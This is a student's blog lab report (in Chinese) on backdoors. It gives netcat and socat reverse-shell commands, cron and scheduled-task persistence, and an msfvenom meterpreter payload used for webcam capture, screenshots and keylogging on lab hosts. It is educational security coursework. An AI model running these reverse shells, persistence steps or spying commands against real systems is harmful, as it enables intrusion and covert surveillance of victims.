代码改变世界

Exp 2 《网络对抗技术》后门原理与实践 20154315李惠航

2018-03-30 17:39  20154315李惠航  阅读(178)  评论(0编辑  收藏

一.实践内容

1使用nc实现win,Linux间的后门连接。 热身

2使用netcat获取主机操作Shell,cron启动。

3使用socat获取主机操作Shell, 任务计划启动。

4使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

5使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

二.学习目标

通过亲手实践建立后门连接,加深对后门的了解与认识,从而提高自己的安全意识。

三.基础问题回答

1.列举你能想到的一个后门进入到你系统中的可能方式?

答:我们在安装常用应用软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

2.列举你知道的后门如何启动起来(win及linux)的方式?

答:windows:直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序

       linux:设置了cron启动,在到达规定的时间时后门启动

3.Meterpreter有哪些给你映像深刻的功能?

答:1.可以获取目标主机摄像头!虽然后面的实验中我并没有成功,但是看别人的博客里都成功了,还是很可怕的

       2.可以截图,万一一个涉密机被装了后门程序,那秘密文件岂不是被轻而易举地泄露了

       3.其实它的每一个功能都让人感到害怕

4.如何发现自己有系统有没有被安装后门?

      1.一般的后门程序都会被杀毒软件查杀,比如实验中的后门程序就被电脑管家消灭了,能被查杀的后门是不是不多了?   

      2.对于厉害的后门,可以及时监控进程是否异常,数据流异常以及开机自启动项,看看有没有消耗CPU特别大的进程。

四.实验过程

4.1 Windows获得Linux Shell

1.在Windows下,先使用ipconfig指令查看本机IP:192.168.1.185

 

2.使用ncat.exe程序监听4315端口:ncat -l -p 4315

3.Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的4315端口。

4.在Linux下,使用ifconfig指令查看Linux主机的IP地址:192.168.200.129

5.连接成功后就可以在Windows的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell

4.2 Linux获得Win Shell

1.在Linux下,使用ncat.exe程序监听4315端口:nc -l -p 4315

2.Windows在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的4315端口:ncat.exe -e cmd.exe 192.168.200.129 4315

3.连接成功后就可以在Linux的终端窗口中输入Windows的命令,此时已经获取了Windows的shell

4.3使用nc传输数据

netcat根据课上所学简单来讲,就是利用TCP、UDP连接进行基本的数据收发,在两台主机之间传输字符文件之类的,所以我们在这里尝试用它在win和linux之间做一个后门。

双向传输字符串:

4.4 以定时任务cron的形式启动netcat获取主机操作Shell

在windows端监听端口4315(忘记截图了)

2、Linux输入指令crontab -e
,选择一个文本编辑器打开,在最后一行添加代码:10 * * * * /bin/netcat 192.168.1.185 4315  -e /bin/sh
在每小时的54分运行ncat回连win主机

3、时间一到就可以运行linux shell指令

4.5 使用socat获取主机操作Shell, 任务计划启动

1.按 win+i 依次打开控制面板->系统和安全->管理工具->任务计划,新建一个任务,自命名。

 

2.新建触发器:

3.编辑操作:

其中添加参数为:tcp-listen:4330 exec:cmd.exe,pty,stderr

4.运行任务

5、Linux下,输入指令 :socat - tcp:192.168.1.185:4315

这里的第一个参数 代表标准的输入输出,第二个流连接到Windows主机的4311端口,此时可以发现已经成功获得了一个win shell:

 

4.6 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

 1.输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.185 LPORT=4315 -f exe > 20154311_backdoor.exe 生成后门程序

2.在windows上使用ncat指令建立端口4315

3.在Linux上通过nc指令传输生成的后门文件20154315_backdoor.exe

在ncat文件目录下可以接收到Linux发送的后门文件(更简单点的方法可以直接在Linux内复制文件粘贴到windows系统下)

在Linux上使用 msfconsle 指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

4.设置完成后,执行监听指令 exploit 。

打开windows上的后门程序20154315_backdoor.exe。

此时Linux已经获得了windows主机的连接,并且得到了远程控制的shell。

使用 webcam_snap 指令可以使用摄像头进行拍照。

使用screenshot指令可以完成截屏操作

执行 keyscan_start 指令开始记录下击键的过程,执行 keyscan_dump 指令读取击键的记录。

五.实验心得与体会

这次实验让我收获良多,首先我知道了后门的原理并且进行了简单的实践,掌握了使用nc实现WindowsLinux之间的后门连接,其次我学会了meterpreter的使用,还掌握了MSF POST模块的简单使用。这次实验让我意识到了保护自己电脑主机的重要性,防火墙和杀毒软件并非相当可靠,今后不能轻易点开陌生人发的链接,不浏览不安全的网站,努力培养信息安全意识,提升自身信息安全方面的素养。